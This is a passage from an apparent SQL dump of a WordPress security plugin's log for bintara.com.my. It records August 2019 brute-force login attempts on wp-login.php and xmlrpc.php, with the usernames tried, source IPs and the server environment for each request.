empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.78.195.10\";s:11:\"REMOTE_PORT\";s:5:\"50550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQedBTEVi0fEJEHuDY-cgAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566842485.0166\";s:12:\"REQUEST_TIME\";s:10:\"1566842485\";}}','notice','2019-08-26 18:01:26','2019-08-26 18:01:25',17687880,19177696,'https://bintara.com.my/wp-login.php',1,0,'103.78.195.10'),(23174,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.101.102\";s:11:\"REMOTE_PORT\";s:5:\"42990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQicB90bn5mtr-PXqqy6gAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566843504.8898\";s:12:\"REQUEST_TIME\";s:10:\"1566843504\";}}','notice','2019-08-26 18:18:26','2019-08-26 18:18:25',17687904,19179104,'https://bintara.com.my/wp-login.php',1,0,'151.80.101.102'),(23175,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.101.102\";s:11:\"REMOTE_PORT\";s:5:\"43217\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQidBTEVi0fEJEHuDZBHwAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566843508.355\";s:12:\"REQUEST_TIME\";s:10:\"1566843508\";}}','notice','2019-08-26 18:18:29','2019-08-26 18:18:28',18200416,19497520,'https://bintara.com.my/xmlrpc.php',1,0,'151.80.101.102'),(23176,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.76.152.220\";s:11:\"REMOTE_PORT\";s:5:\"37036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQkTRTEVi0fEJEHuDZCAQAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566843981.8519\";s:12:\"REQUEST_TIME\";s:10:\"1566843981\";}}','notice','2019-08-26 18:26:23','2019-08-26 18:26:22',17684672,19174704,'https://bintara.com.my/wp-login.php',1,0,'45.76.152.220'),(23177,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.76.152.220\";s:11:\"REMOTE_PORT\";s:5:\"37382\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQkTx90bn5mtr-PXqqzDgAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566843983.8113\";s:12:\"REQUEST_TIME\";s:10:\"1566843983\";}}','notice','2019-08-26 18:26:25','2019-08-26 18:26:24',18199480,19496640,'https://bintara.com.my/xmlrpc.php',1,0,'45.76.152.220'),(23178,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-26 18:38:06','2019-08-26 18:38:04',17651952,18115504,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'45.64.1.149'),(23179,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQnCx90bn5mtr-PXqqzUQAAAEc\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"45.64.1.149\";s:11:\"REMOTE_PORT\";s:5:\"34994\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQnCx90bn5mtr-PXqqzUQAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844683.9892\";s:12:\"REQUEST_TIME\";s:10:\"1566844683\";}}','notice','2019-08-26 18:38:07','2019-08-26 18:38:04',18477448,19679688,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'45.64.1.149'),(23180,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQnEQ0@TGWC-1tzGX5b@AAAAJY\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"27.254.82.235\";s:11:\"REMOTE_PORT\";s:5:\"34740\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQnEQ0@TGWC-1tzGX5b@AAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566844689.461\";s:12:\"REQUEST_TIME\";s:10:\"1566844689\";}}','notice','2019-08-26 18:38:14','2019-08-26 18:38:09',18297088,19499600,'http://bintara.com.my/blog/xmlrpc.php',1,0,'27.254.82.235'),(23181,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQnEQ0@TGWC-1tzGX5b@QAAAJU\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.208.146\";s:11:\"REMOTE_PORT\";s:5:\"41572\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQnEQ0@TGWC-1tzGX5b@QAAAJU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844689.6707\";s:12:\"REQUEST_TIME\";s:10:\"1566844689\";}}','notice','2019-08-26 18:38:14','2019-08-26 18:38:10',18300592,19501520,'http://bintara.com.my/blog/xmlrpc.php',1,0,'50.62.208.146'),(23182,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 